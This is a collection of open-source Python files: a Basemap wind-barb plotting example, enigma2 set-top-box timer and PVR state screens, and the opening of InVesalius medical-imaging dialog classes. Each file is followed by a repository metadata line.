# Use a context manager so the file handle is always closed (the original
# never closed it and also shadowed the 'file' builtin).
with open('fcover.dat', 'r') as datafile:
    for line in datafile:
        fields = line.replace('\n', '').split()
        ul.append(float(fields[0]))
        vl.append(float(fields[1]))
        pl.append(float(fields[2]))
# Reshape flat lists into (lat, lon) grids.
u = np.reshape(np.array(ul, np.float32), (nlats, nlons))
v = np.reshape(np.array(vl, np.float32), (nlats, nlons))
p = np.reshape(np.array(pl, np.float32), (nlats, nlons))
lats1 = -90. + dellat * np.arange(nlats)
lons1 = -180. + dellon * np.arange(nlons)
lons, lats = np.meshgrid(lons1, lats1)
# convert from m/s to knots.
u = 1.944*u; v = 1.944*v
# plot barbs in map projection coordinates.
# stereographic projection (Northern Hemisphere).
m = Basemap(width=10000000,height=10000000,lon_0=-90,lat_0=45.,lat_ts=45,
            resolution='l',projection='stere')
x,y = m(lons,lats)
# transform from spherical to map projection coordinates (rotation
# and interpolation), thinning the field to a nxv-by-nyv grid.
nxv = 25; nyv = 25
udat, vdat, xv, yv = m.transform_vector(u,v,lons1,lats1,nxv,nyv,returnxy=True)
# create a figure, add an axes.
fig=plt.figure(figsize=(8,6))
ax = fig.add_axes([0.1,0.1,0.8,0.8])
# plot color-filled contours over map
levs = np.arange(960,1051,4)
cs1 = m.contour(x,y,p,levs,colors='k',linewidths=0.5)
cs2 = m.contourf(x,y,p,levs)
# plot barbs.
m.barbs(xv,yv,udat,vdat,length=6,barbcolor='k',flagcolor='r',linewidth=0.5)
# plot colorbar for pressure
m.colorbar(pad='12%') # draw colorbar
# draw coastlines
m.drawcoastlines()
# draw parallels
m.drawparallels(np.arange(0,81,20),labels=[1,1,0,0])
# draw meridians
m.drawmeridians(np.arange(-180,0,20),labels=[0,0,0,1])
plt.title('Surface Wind Barbs and Pressure (NH)')
# stereographic projection (Southern Hemisphere).
# 'flip_barb' flag is automatically set for SH data, so that
# barbs point toward lower pressure (in both Hemispheres).
m = Basemap(width=10000000,height=10000000,lon_0=-90,lat_0=-45.,lat_ts=-45,
            resolution='l',projection='stere')
x,y = m(lons,lats)
# transform from spherical to map projection coordinates (rotation
# and interpolation).
nxv = 25; nyv = 25
udat, vdat, xv, yv = m.transform_vector(u,v,lons1,lats1,nxv,nyv,returnxy=True)
# create a figure, add an axes.
fig=plt.figure(figsize=(8,6))
ax = fig.add_axes([0.1,0.1,0.8,0.8])
# plot color-filled contours over map
levs = np.arange(960,1051,4)
cs1 = m.contour(x,y,p,levs,colors='k',linewidths=0.5)
cs2 = m.contourf(x,y,p,levs)
# plot barbs.
m.barbs(xv,yv,udat,vdat,length=6,barbcolor='k',flagcolor='r',linewidth=0.5)
# plot colorbar for pressure
m.colorbar(pad='12%') # draw colorbar
# draw coastlines
m.drawcoastlines()
# draw parallels
m.drawparallels(np.arange(-80,-19,20),labels=[1,1,0,0])
# draw meridians
m.drawmeridians(np.arange(-180,0,20),labels=[0,0,1,0])
plt.title('Surface Wind Barbs and Pressure (SH)',y=1.04)
plt.show()
| raincoatrun/basemap | examples/barb_demo.py | Python | gpl-2.0 | 2,853 |
from Screen import Screen
from Components.Label import Label
class PVRState(Screen):
	"""Overlay screen showing the current PVR state (play/pause/etc.).

	The "state" label starts empty; its text is set by whoever opens the
	screen (presumably the infobar — verify against callers).
	"""
	def __init__(self, session):
		Screen.__init__(self, session)
		self["state"] = Label(text="")
class TimeshiftState(PVRState):
	"""Behaviorally identical to PVRState; kept as a distinct class,
	presumably so skins can style the timeshift variant separately —
	verify against skin definitions."""
	pass
| blzr/enigma2 | lib/python/Screens/PVRState.py | Python | gpl-2.0 | 224 |
# -*- coding: utf-8 -*-
from time import localtime, mktime, time, strftime
from datetime import datetime
from enigma import eEPGCache
from Screens.Screen import Screen
import ChannelSelection
from ServiceReference import ServiceReference
from Components.config import config, ConfigSelection, ConfigText, ConfigSubList, ConfigDateTime, ConfigClock, ConfigYesNo, getConfigListEntry
from Components.ActionMap import NumberActionMap, ActionMap
from Components.ConfigList import ConfigListScreen
from Components.MenuList import MenuList
from Components.Button import Button
from Components.Label import Label
from Components.Pixmap import Pixmap
from Components.SystemInfo import SystemInfo
from Components.UsageConfig import defaultMoviePath
from Components.Sources.Boolean import Boolean
from Screens.MovieSelection import getPreferredTagEditor
from Screens.LocationBox import MovieLocationBox
from Screens.ChoiceBox import ChoiceBox
from Screens.MessageBox import MessageBox
from Screens.VirtualKeyBoard import VirtualKeyBoard
from Screens.Setup import SetupSummary
from RecordTimer import AFTEREVENT
class TimerEntry(Screen, ConfigListScreen):
def __init__(self, session, timer):
Screen.__init__(self, session)
self.setup_title = _("Timer entry")
self.timer = timer
self.entryDate = None
self.entryService = None
self["HelpWindow"] = Pixmap()
self["HelpWindow"].hide()
self["VKeyIcon"] = Boolean(False)
self["description"] = Label("")
self["oktext"] = Label(_("OK"))
self["canceltext"] = Label(_("Cancel"))
self["ok"] = Pixmap()
self["cancel"] = Pixmap()
self.createConfig()
self["actions"] = NumberActionMap(["SetupActions", "GlobalActions", "PiPSetupActions", "ColorActions"],
{
"ok": self.keySelect,
"save": self.keyGo,
"cancel": self.keyCancel,
"volumeUp": self.incrementStart,
"volumeDown": self.decrementStart,
"size+": self.incrementEnd,
"size-": self.decrementEnd,
}, -2)
self["VirtualKB"] = ActionMap(["VirtualKeyboardActions"],
{
"showVirtualKeyboard": self.KeyText,
}, -2)
self["VirtualKB"].setEnabled(False)
self.onChangedEntry = [ ]
self.list = []
ConfigListScreen.__init__(self, self.list, session = session)
self.createSetup("config")
self.onLayoutFinish.append(self.layoutFinished)
if not self.selectionChanged in self["config"].onSelectionChanged:
self["config"].onSelectionChanged.append(self.selectionChanged)
self.selectionChanged()
def createConfig(self):
justplay = self.timer.justplay
always_zap = self.timer.always_zap
rename_repeat = self.timer.rename_repeat
afterevent = {
AFTEREVENT.NONE: "nothing",
AFTEREVENT.DEEPSTANDBY: "deepstandby",
AFTEREVENT.STANDBY: "standby",
AFTEREVENT.AUTO: "auto"
}[self.timer.afterEvent]
if self.timer.record_ecm and self.timer.descramble:
recordingtype = "descrambled+ecm"
elif self.timer.record_ecm:
recordingtype = "scrambled+ecm"
elif self.timer.descramble:
recordingtype = "normal"
weekday_table = ("mon", "tue", "wed", "thu", "fri", "sat", "sun")
# calculate default values
day = []
weekday = 0
for x in (0, 1, 2, 3, 4, 5, 6):
day.append(0)
if self.timer.repeated: # repeated
type = "repeated"
if self.timer.repeated == 31: # Mon-Fri
repeated = "weekdays"
elif self.timer.repeated == 127: # daily
repeated = "daily"
else:
flags = self.timer.repeated
repeated = "user"
count = 0
for x in (0, 1, 2, 3, 4, 5, 6):
if flags == 1: # weekly
# print "Set to weekday " + str(x)
weekday = x
if flags & 1 == 1: # set user defined flags
day[x] = 1
count += 1
else:
day[x] = 0
flags >>= 1
if count == 1:
repeated = "weekly"
else: # once
type = "once"
repeated = None
weekday = int(strftime("%u", localtime(self.timer.begin))) - 1
day[weekday] = 1
self.timerentry_justplay = ConfigSelection(choices = [
("zap", _("zap")), ("record", _("record")), ("zap+record", _("zap and record"))],
default = {0: "record", 1: "zap", 2: "zap+record"}[justplay + 2*always_zap])
if SystemInfo["DeepstandbySupport"]:
shutdownString = _("go to deep standby")
else:
shutdownString = _("shut down")
self.timerentry_afterevent = ConfigSelection(choices = [("nothing", _("do nothing")), ("standby", _("go to standby")), ("deepstandby", shutdownString), ("auto", _("auto"))], default = afterevent)
self.timerentry_recordingtype = ConfigSelection(choices = [("normal", _("normal")), ("descrambled+ecm", _("descramble and record ecm")), ("scrambled+ecm", _("don't descramble, record ecm"))], default = recordingtype)
self.timerentry_type = ConfigSelection(choices = [("once",_("once")), ("repeated", _("repeated"))], default = type)
self.timerentry_name = ConfigText(default = self.timer.name.replace('\xc2\x86', '').replace('\xc2\x87', '').encode("utf-8"), visible_width = 50, fixed_size = False)
self.timerentry_description = ConfigText(default = self.timer.description, visible_width = 50, fixed_size = False)
self.timerentry_tags = self.timer.tags[:]
# if no tags found, make name of event default tag set.
if not self.timerentry_tags:
tagname = self.timer.name.strip()
if tagname:
tagname = tagname[0].upper() + tagname[1:].replace(" ", "_")
self.timerentry_tags.append(tagname)
self.timerentry_tagsset = ConfigSelection(choices = [not self.timerentry_tags and "None" or " ".join(self.timerentry_tags)])
self.timerentry_repeated = ConfigSelection(default = repeated, choices = [("weekly", _("weekly")), ("daily", _("daily")), ("weekdays", _("Mon-Fri")), ("user", _("user defined"))])
self.timerentry_renamerepeat = ConfigYesNo(default = rename_repeat)
self.timerentry_date = ConfigDateTime(default = self.timer.begin, formatstring = _("%d %B %Y"), increment = 86400)
self.timerentry_starttime = ConfigClock(default = self.timer.begin)
self.timerentry_endtime = ConfigClock(default = self.timer.end)
self.timerentry_showendtime = ConfigSelection(default = False, choices = [(True, _("yes")), (False, _("no"))])
default = self.timer.dirname or defaultMoviePath()
tmp = config.movielist.videodirs.value
if default not in tmp:
tmp.append(default)
self.timerentry_dirname = ConfigSelection(default = default, choices = tmp)
self.timerentry_repeatedbegindate = ConfigDateTime(default = self.timer.repeatedbegindate, formatstring = _("%d.%B %Y"), increment = 86400)
self.timerentry_weekday = ConfigSelection(default = weekday_table[weekday], choices = [("mon",_("Monday")), ("tue", _("Tuesday")), ("wed",_("Wednesday")), ("thu", _("Thursday")), ("fri", _("Friday")), ("sat", _("Saturday")), ("sun", _("Sunday"))])
self.timerentry_day = ConfigSubList()
for x in (0, 1, 2, 3, 4, 5, 6):
self.timerentry_day.append(ConfigYesNo(default = day[x]))
# FIXME some service-chooser needed here
servicename = "N/A"
try: # no current service available?
servicename = str(self.timer.service_ref.getServiceName())
except:
pass
self.timerentry_service_ref = self.timer.service_ref
self.timerentry_service = ConfigSelection([servicename])
def createSetup(self, widget):
self.list = []
self.entryName = getConfigListEntry(_("Name"), self.timerentry_name, _("Set the name the recording will get."))
self.list.append(self.entryName)
self.entryDescription = getConfigListEntry(_("Description"), self.timerentry_description, _("Set the description of the recording."))
self.list.append(self.entryDescription)
self.timerJustplayEntry = getConfigListEntry(_("Timer type"), self.timerentry_justplay, _("Chose between record and ZAP."))
self.list.append(self.timerJustplayEntry)
self.timerTypeEntry = getConfigListEntry(_("Repeat type"), self.timerentry_type, _("A repeating timer or just once?"))
self.list.append(self.timerTypeEntry)
if self.timerentry_type.value == "once":
self.frequencyEntry = None
else: # repeated
self.frequencyEntry = getConfigListEntry(_("Repeats"), self.timerentry_repeated, _("Choose between Daily, Weekly, Weekdays or user defined."))
self.list.append(self.frequencyEntry)
self.repeatedbegindateEntry = getConfigListEntry(_("Starting on"), self.timerentry_repeatedbegindate, _("Set the date the timer must start."))
self.list.append(self.repeatedbegindateEntry)
if self.timerentry_repeated.value == "daily":
pass
if self.timerentry_repeated.value == "weekdays":
pass
if self.timerentry_repeated.value == "weekly":
self.list.append(getConfigListEntry(_("Weekday"), self.timerentry_weekday))
if self.timerentry_repeated.value == "user":
self.list.append(getConfigListEntry(_("Monday"), self.timerentry_day[0]))
self.list.append(getConfigListEntry(_("Tuesday"), self.timerentry_day[1]))
self.list.append(getConfigListEntry(_("Wednesday"), self.timerentry_day[2]))
self.list.append(getConfigListEntry(_("Thursday"), self.timerentry_day[3]))
self.list.append(getConfigListEntry(_("Friday"), self.timerentry_day[4]))
self.list.append(getConfigListEntry(_("Saturday"), self.timerentry_day[5]))
self.list.append(getConfigListEntry(_("Sunday"), self.timerentry_day[6]))
if self.timerentry_justplay.value != "zap":
self.list.append(getConfigListEntry(_("Rename name and description for new events"), self.timerentry_renamerepeat))
self.entryDate = getConfigListEntry(_("Date"), self.timerentry_date, _("Set the date the timer must start."))
if self.timerentry_type.value == "once":
self.list.append(self.entryDate)
self.entryStartTime = getConfigListEntry(_("Start time"), self.timerentry_starttime, _("Set the time the timer must start."))
self.list.append(self.entryStartTime)
self.entryShowEndTime = getConfigListEntry(_("Set end time"), self.timerentry_showendtime, _("Set the time the timer must stop."))
# if self.timerentry_justplay.value == "zap":
# self.list.append(self.entryShowEndTime)
self.entryEndTime = getConfigListEntry(_("End time"), self.timerentry_endtime, _("Set the time the timer must stop."))
if self.timerentry_justplay.value != "zap" or self.timerentry_showendtime.value:
self.list.append(self.entryEndTime)
self.channelEntry = getConfigListEntry(_("Channel"), self.timerentry_service, _("Set the channel for this timer."))
self.list.append(self.channelEntry)
self.dirname = getConfigListEntry(_("Location"), self.timerentry_dirname, _("Where should the recording be saved?"))
self.tagsSet = getConfigListEntry(_("Tags"), self.timerentry_tagsset, _("Choose a tag for easy finding a recording."))
if self.timerentry_justplay.value != "zap":
if config.usage.setup_level.index >= 2: # expert+
self.list.append(self.dirname)
if getPreferredTagEditor():
self.list.append(self.tagsSet)
self.list.append(getConfigListEntry(_("After event"), self.timerentry_afterevent, _("What action is required on complettion of the timer? 'Auto' lets the box return to the state it had when the timer started. 'Do nothing', 'Go to standby' and 'Go to deep standby' do ecaxtly that.")))
self.list.append(getConfigListEntry(_("Recording type"), self.timerentry_recordingtype, _("Descramble & record ECM' gives the option to descramble afterwards if descrambling on recording failed. 'Don't descramble, record ECM' save a scramble recording that can be descrambled on playback. 'Normal' means descramble the recording and don't record ECM.")))
self[widget].list = self.list
self[widget].l.setList(self.list)
def selectionChanged(self):
if self["config"].getCurrent():
if len(self["config"].getCurrent()) > 2 and self["config"].getCurrent()[2]:
self["description"].setText(self["config"].getCurrent()[2])
if isinstance(self["config"].getCurrent()[1], ConfigText):
if self.has_key("VKeyIcon"):
self["VirtualKB"].setEnabled(True)
self["VKeyIcon"].boolean = True
if self.has_key("HelpWindow"):
if self["config"].getCurrent()[1].help_window and self["config"].getCurrent()[1].help_window.instance is not None:
helpwindowpos = self["HelpWindow"].getPosition()
from enigma import ePoint
self["config"].getCurrent()[1].help_window.instance.move(ePoint(helpwindowpos[0],helpwindowpos[1]))
else:
if self.has_key("VKeyIcon"):
self["VirtualKB"].setEnabled(False)
self["VKeyIcon"].boolean = False
else:
if self.has_key("VKeyIcon"):
self["VirtualKB"].setEnabled(False)
self["VKeyIcon"].boolean = False
def layoutFinished(self):
self.setTitle(_(self.setup_title))
def createSummary(self):
return SetupSummary
# for summary:
def changedEntry(self):
for x in self.onChangedEntry:
x()
def getCurrentEntry(self):
return self["config"].getCurrent() and self["config"].getCurrent()[0] or ""
def getCurrentValue(self):
return self["config"].getCurrent() and str(self["config"].getCurrent()[1].getText()) or ""
def newConfig(self):
if self["config"].getCurrent() in (self.timerTypeEntry, self.timerJustplayEntry, self.frequencyEntry, self.entryShowEndTime):
self.createSetup("config")
def KeyText(self):
if self['config'].getCurrent()[0] in (_('Name'), _("Description")):
self.session.openWithCallback(self.renameEntryCallback, VirtualKeyBoard, title=self["config"].getCurrent()[2], text = self["config"].getCurrent()[1].value)
def keyLeft(self):
cur = self["config"].getCurrent()
if cur in (self.channelEntry, self.tagsSet):
self.keySelect()
elif cur in (self.entryName, self.entryDescription):
self.renameEntry()
else:
ConfigListScreen.keyLeft(self)
self.newConfig()
def keyRight(self):
cur = self["config"].getCurrent()
if cur in (self.channelEntry, self.tagsSet):
self.keySelect()
elif cur in (self.entryName, self.entryDescription):
self.renameEntry()
else:
ConfigListScreen.keyRight(self)
self.newConfig()
def renameEntry(self):
cur = self["config"].getCurrent()
if cur == self.entryName:
title_text = _("Please enter new name:")
old_text = self.timerentry_name.value
else:
title_text = _("Please enter new description:")
old_text = self.timerentry_description.value
self.session.openWithCallback(self.renameEntryCallback, VirtualKeyBoard, title=title_text, text=old_text)
def renameEntryCallback(self, answer):
if answer:
if self["config"].getCurrent() == self.entryName:
self.timerentry_name.value = answer
self["config"].invalidate(self.entryName)
else:
self.timerentry_description.value = answer
self["config"].invalidate(self.entryDescription)
def handleKeyFileCallback(self, answer):
if self["config"].getCurrent() in (self.channelEntry, self.tagsSet):
self.keySelect()
else:
ConfigListScreen.handleKeyFileCallback(self, answer)
self.newConfig()
def keySelect(self):
cur = self["config"].getCurrent()
if cur == self.channelEntry:
self.session.openWithCallback(
self.finishedChannelSelection,
ChannelSelection.SimpleChannelSelection,
_("Select channel to record from"),
currentBouquet=True
)
elif config.usage.setup_level.index >= 2 and cur == self.dirname:
self.session.openWithCallback(
self.pathSelected,
MovieLocationBox,
_("Select target folder"),
self.timerentry_dirname.value,
minFree = 100 # We require at least 100MB free space
)
elif getPreferredTagEditor() and cur == self.tagsSet:
self.session.openWithCallback(
self.tagEditFinished,
getPreferredTagEditor(),
self.timerentry_tags
)
else:
self.keyGo()
def finishedChannelSelection(self, *args):
if args:
self.timerentry_service_ref = ServiceReference(args[0])
self.timerentry_service.setCurrentText(self.timerentry_service_ref.getServiceName())
self["config"].invalidate(self.channelEntry)
def getTimestamp(self, date, mytime):
d = localtime(date)
dt = datetime(d.tm_year, d.tm_mon, d.tm_mday, mytime[0], mytime[1])
return int(mktime(dt.timetuple()))
def getBeginEnd(self):
date = self.timerentry_date.value
endtime = self.timerentry_endtime.value
starttime = self.timerentry_starttime.value
begin = self.getTimestamp(date, starttime)
end = self.getTimestamp(date, endtime)
# if the endtime is less than the starttime, add 1 day.
if end < begin:
end += 86400
# if the timer type is a Zap and no end is set, set duration to 1 second so time is shown in EPG's.
if self.timerentry_justplay.value == "zap":
if not self.timerentry_showendtime.value:
end = begin + (config.recording.margin_before.value*60) + 1
return begin, end
def selectChannelSelector(self, *args):
self.session.openWithCallback(
self.finishedChannelSelectionCorrection,
ChannelSelection.SimpleChannelSelection,
_("Select channel to record from")
)
def finishedChannelSelectionCorrection(self, *args):
if args:
self.finishedChannelSelection(*args)
self.keyGo()
def keyGo(self, result = None):
if not self.timerentry_service_ref.isRecordable():
self.session.openWithCallback(self.selectChannelSelector, MessageBox, _("You didn't select a channel to record from."), MessageBox.TYPE_ERROR)
return
self.timer.name = self.timerentry_name.value
self.timer.description = self.timerentry_description.value
self.timer.justplay = self.timerentry_justplay.value == "zap"
self.timer.always_zap = self.timerentry_justplay.value == "zap+record"
self.timer.rename_repeat = self.timerentry_renamerepeat.value
if self.timerentry_justplay.value == "zap":
if not self.timerentry_showendtime.value:
self.timerentry_endtime.value = self.timerentry_starttime.value
self.timer.resetRepeated()
self.timer.afterEvent = {
"nothing": AFTEREVENT.NONE,
"deepstandby": AFTEREVENT.DEEPSTANDBY,
"standby": AFTEREVENT.STANDBY,
"auto": AFTEREVENT.AUTO
}[self.timerentry_afterevent.value]
self.timer.descramble = {
"normal": True,
"descrambled+ecm": True,
"scrambled+ecm": False,
}[self.timerentry_recordingtype.value]
self.timer.record_ecm = {
"normal": False,
"descrambled+ecm": True,
"scrambled+ecm": True,
}[self.timerentry_recordingtype.value]
self.timer.service_ref = self.timerentry_service_ref
self.timer.tags = self.timerentry_tags
if self.timer.dirname or self.timerentry_dirname.value != defaultMoviePath():
self.timer.dirname = self.timerentry_dirname.value
config.movielist.last_timer_videodir.value = self.timer.dirname
config.movielist.last_timer_videodir.save()
if self.timerentry_type.value == "once":
self.timer.begin, self.timer.end = self.getBeginEnd()
if self.timerentry_type.value == "repeated":
if self.timerentry_repeated.value == "daily":
for x in (0, 1, 2, 3, 4, 5, 6):
self.timer.setRepeated(x)
if self.timerentry_repeated.value == "weekly":
self.timer.setRepeated(self.timerentry_weekday.index)
if self.timerentry_repeated.value == "weekdays":
for x in (0, 1, 2, 3, 4):
self.timer.setRepeated(x)
if self.timerentry_repeated.value == "user":
for x in (0, 1, 2, 3, 4, 5, 6):
if self.timerentry_day[x].value:
self.timer.setRepeated(x)
self.timer.repeatedbegindate = self.getTimestamp(self.timerentry_repeatedbegindate.value, self.timerentry_starttime.value)
if self.timer.repeated:
self.timer.begin = self.getTimestamp(self.timerentry_repeatedbegindate.value, self.timerentry_starttime.value)
self.timer.end = self.getTimestamp(self.timerentry_repeatedbegindate.value, self.timerentry_endtime.value)
else:
self.timer.begin = self.getTimestamp(time.time(), self.timerentry_starttime.value)
self.timer.end = self.getTimestamp(time.time(), self.timerentry_endtime.value)
# when a timer end is set before the start, add 1 day
if self.timer.end < self.timer.begin:
self.timer.end += 86400
if self.timer.eit is not None:
event = eEPGCache.getInstance().lookupEventId(self.timer.service_ref.ref, self.timer.eit)
if event:
n = event.getNumOfLinkageServices()
if n > 1:
tlist = []
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
parent = self.timer.service_ref.ref
selection = 0
for x in range(n):
i = event.getLinkageService(parent, x)
if i.toString() == ref.toString():
selection = x
tlist.append((i.getName(), i))
self.session.openWithCallback(self.subserviceSelected, ChoiceBox, title=_("Please select a subservice to record..."), list = tlist, selection = selection)
return
elif n > 0:
parent = self.timer.service_ref.ref
self.timer.service_ref = ServiceReference(event.getLinkageService(parent, 0))
self.saveTimer()
self.close((True, self.timer))
def changeTimerType(self):
self.timerentry_justplay.selectNext()
self.timerJustplayEntry = getConfigListEntry(_("Timer type"), self.timerentry_justplay)
self["config"].invalidate(self.timerJustplayEntry)
def incrementStart(self):
self.timerentry_starttime.increment()
self["config"].invalidate(self.entryStartTime)
if self.timerentry_type.value == "once" and self.timerentry_starttime.value == [0, 0]:
self.timerentry_date.value += 86400
self["config"].invalidate(self.entryDate)
def decrementStart(self):
self.timerentry_starttime.decrement()
self["config"].invalidate(self.entryStartTime)
if self.timerentry_type.value == "once" and self.timerentry_starttime.value == [23, 59]:
self.timerentry_date.value -= 86400
self["config"].invalidate(self.entryDate)
def incrementEnd(self):
if self.entryEndTime is not None:
self.timerentry_endtime.increment()
self["config"].invalidate(self.entryEndTime)
def decrementEnd(self):
if self.entryEndTime is not None:
self.timerentry_endtime.decrement()
self["config"].invalidate(self.entryEndTime)
def subserviceSelected(self, service):
if not service is None:
self.timer.service_ref = ServiceReference(service[1])
self.saveTimer()
self.close((True, self.timer))
def saveTimer(self):
self.session.nav.RecordTimer.saveTimer()
def keyCancel(self):
self.close((False,))
def pathSelected(self, res):
if res is not None:
if config.movielist.videodirs.value != self.timerentry_dirname.choices:
self.timerentry_dirname.setChoices(config.movielist.videodirs.value, default=res)
self.timerentry_dirname.value = res
def tagEditFinished(self, ret):
if ret is not None:
self.timerentry_tags = ret
self.timerentry_tagsset.setChoices([not ret and "None" or " ".join(ret)])
self["config"].invalidate(self.tagsSet)
class TimerLog(Screen):
	"""Screen showing a timer's log entries, with delete/clear editing.

	Closes with (True, timer) when the log was modified, (False,) otherwise.
	"""
	def __init__(self, session, timer):
		Screen.__init__(self, session)
		self.timer = timer
		# Work on a copy so cancelling leaves the timer's log untouched.
		self.log_entries = self.timer.log_entries[:]
		self.fillLogList()
		self["loglist"] = MenuList(self.list)
		self["logentry"] = Label()
		self["key_red"] = Button(_("Delete entry"))
		self["key_green"] = Button()
		self["key_blue"] = Button(_("Clear log"))
		self.onShown.append(self.updateText)
		self["actions"] = NumberActionMap(["OkCancelActions", "DirectionActions", "ColorActions"],
		{
			"ok": self.keyClose,
			"cancel": self.keyClose,
			"up": self.up,
			"down": self.down,
			"left": self.left,
			"right": self.right,
			"red": self.deleteEntry,
			"blue": self.clearLog
		}, -1)
		self.setTitle(_("Timer log"))

	def deleteEntry(self):
		# Remove the selected entry; no-op when the list is empty.
		cur = self["loglist"].getCurrent()
		if cur is None:
			return
		self.log_entries.remove(cur[1])
		self.fillLogList()
		self["loglist"].l.setList(self.list)
		self.updateText()

	def fillLogList(self):
		# Each row is ("<timestamp> - <message>", raw_log_entry); log entries
		# appear to be (when, code, message) tuples -- message at index 2.
		self.list = [(str(strftime("%Y-%m-%d %H-%M", localtime(x[0])) + " - " + x[2]), x) for x in self.log_entries]

	def clearLog(self):
		self.log_entries = []
		self.fillLogList()
		self["loglist"].l.setList(self.list)
		self.updateText()

	def keyClose(self):
		# Commit the edited log only when it actually changed.
		if self.timer.log_entries != self.log_entries:
			self.timer.log_entries = self.log_entries
			self.close((True, self.timer))
		else:
			self.close((False,))

	def up(self):
		self["loglist"].instance.moveSelection(self["loglist"].instance.moveUp)
		self.updateText()

	def down(self):
		self["loglist"].instance.moveSelection(self["loglist"].instance.moveDown)
		self.updateText()

	def left(self):
		self["loglist"].instance.moveSelection(self["loglist"].instance.pageUp)
		self.updateText()

	def right(self):
		self["loglist"].instance.moveSelection(self["loglist"].instance.pageDown)
		self.updateText()

	def updateText(self):
		# Show the selected entry's full message below the list.
		if self.list:
			self["logentry"].setText(str(self["loglist"].getCurrent()[1][2]))
		else:
			self["logentry"].setText("")
class InstantRecordTimerEntry(TimerEntry):
	"""Headless TimerEntry used for instant recordings: no form is shown,
	the timer is committed immediately on construction via keyGo()."""
	def __init__(self, session, timer, zap):
		Screen.__init__(self, session)
		self.setup_title = ""
		self.timer = timer
		self.timer.justplay = zap
		self.entryDate = None
		self.entryService = None
		# Commit right away -- this screen is never actually displayed.
		self.keyGo()

	def keyGo(self, result = None):
		if self.timer.justplay:
			# Zap timers get a minimal duration so they show up in the EPG.
			self.timer.end = self.timer.begin + (config.recording.margin_before.value * 60) + 1
		self.timer.resetRepeated()
		self.saveTimer()

	def retval(self):
		# Accessor for the committed timer (used by the caller).
		return self.timer

	def saveTimer(self):
		self.session.nav.RecordTimer.saveTimer()
| mrnamingo/vix4-34-enigma2-bcm | lib/python/Screens/TimerEntry.py | Python | gpl-2.0 | 25,002 |
# -*- coding: UTF-8 -*-
#--------------------------------------------------------------------------
# Software: InVesalius - Software de Reconstrucao 3D de Imagens Medicas
# Copyright: (C) 2001 Centro de Pesquisas Renato Archer
# Homepage: http://www.softwarepublico.gov.br
# Contact: invesalius@cti.gov.br
# License: GNU - GPL 2 (LICENSE.txt/LICENCA.txt)
#--------------------------------------------------------------------------
# Este programa e software livre; voce pode redistribui-lo e/ou
# modifica-lo sob os termos da Licenca Publica Geral GNU, conforme
# publicada pela Free Software Foundation; de acordo com a versao 2
# da Licenca.
#
# Este programa eh distribuido na expectativa de ser util, mas SEM
# QUALQUER GARANTIA; sem mesmo a garantia implicita de
# COMERCIALIZACAO ou de ADEQUACAO A QUALQUER PROPOSITO EM
# PARTICULAR. Consulte a Licenca Publica Geral GNU para obter mais
# detalhes.
#--------------------------------------------------------------------------
import itertools
import os
import random
import sys
import time
from functools import partial
from concurrent import futures
if sys.platform == 'win32':
try:
import win32api
_has_win32api = True
except ImportError:
_has_win32api = False
else:
_has_win32api = False
import vtk
import wx
try:
from wx.adv import BitmapComboBox
except ImportError:
from wx.combo import BitmapComboBox
from vtk.wx.wxVTKRenderWindowInteractor import wxVTKRenderWindowInteractor
from wx.lib import masked
from wx.lib.agw import floatspin
import wx.lib.filebrowsebutton as filebrowse
from wx.lib.wordwrap import wordwrap
from invesalius.pubsub import pub as Publisher
import csv
try:
from wx.adv import AboutDialogInfo, AboutBox
except ImportError:
from wx import AboutDialogInfo, AboutBox
import invesalius.constants as const
import invesalius.data.coordinates as dco
import invesalius.data.transformations as tr
import invesalius.gui.widgets.gradient as grad
import invesalius.session as ses
import invesalius.utils as utils
import invesalius.data.vtk_utils as vtku
import invesalius.data.coregistration as dcr
from invesalius.gui.widgets.inv_spinctrl import InvSpinCtrl, InvFloatSpinCtrl
from invesalius.gui.widgets import clut_imagedata
from invesalius.gui.widgets.clut_imagedata import CLUTImageDataWidget, EVT_CLUT_NODE_CHANGED
import numpy as np
from numpy.core.umath_tests import inner1d
from invesalius import inv_paths
try:
from agw import floatspin as FS
except ImportError: # if it's not there locally, try the wxPython lib.
import wx.lib.agw.floatspin as FS
class MaskEvent(wx.PyCommandEvent):
    """Command event that carries the index of the mask it refers to."""

    def __init__(self, evtType, id, mask_index):
        wx.PyCommandEvent.__init__(self, evtType, id)
        # Index of the mask associated with this event.
        self.mask_index = mask_index
# Custom wx event type + binder fired when a mask is set; MaskEvent carries the index.
myEVT_MASK_SET = wx.NewEventType()
EVT_MASK_SET = wx.PyEventBinder(myEVT_MASK_SET, 1)
class NumberDialog(wx.Dialog):
    """Modal dialog asking the user for a single numeric value."""
    def __init__(self, message, value=0):
        """Build the dialog: *message* label above a numeric field preset to *value*."""
        wx.Dialog.__init__(self, None, -1, "InVesalius 3", size=wx.DefaultSize,
                           pos=wx.DefaultPosition,
                           style=wx.DEFAULT_DIALOG_STYLE)
        # Static text which contains message to user
        label = wx.StaticText(self, -1, message)
        # Numeric value to be changed by user
        num_ctrl = masked.NumCtrl(self, value=value, integerWidth=3,
                                  fractionWidth=2,
                                  allowNegative=True,
                                  signedForegroundColour = "Black")
        self.num_ctrl = num_ctrl
        # Buttons
        btn_ok = wx.Button(self, wx.ID_OK)
        btn_ok.SetHelpText(_("Value will be applied."))
        btn_ok.SetDefault()
        btn_cancel = wx.Button(self, wx.ID_CANCEL)
        btn_cancel.SetHelpText(_("Value will not be applied."))
        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_ok)
        btnsizer.AddButton(btn_cancel)
        btnsizer.Realize()
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(label, 0, wx.ALIGN_CENTRE|wx.ALL, 5)
        sizer.Add(num_ctrl, 0, wx.ALIGN_CENTRE|wx.ALL, 5)
        sizer.Add(btnsizer, 0, wx.ALL, 5)
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Centre()
    def SetValue(self, value):
        """Set the value shown in the numeric field."""
        self.num_ctrl.SetValue(value)
    def GetValue(self):
        """Return the value currently entered in the numeric field."""
        return self.num_ctrl.GetValue()
class ResizeImageDialog(wx.Dialog):
    """Dialog warning about low memory and asking for a resolution percentage."""
    def __init__(self):#, message, value=0):
        wx.Dialog.__init__(self, None, -1, "InVesalius 3", size=wx.DefaultSize,
                           pos=wx.DefaultPosition,
                           style=wx.DEFAULT_DIALOG_STYLE)
        lbl_message = wx.StaticText(self, -1, _("InVesalius is running on a 32-bit operating system or has insufficient memory. \nIf you want to work with 3D surfaces or volume rendering, \nit is recommended to reduce the medical images resolution."))
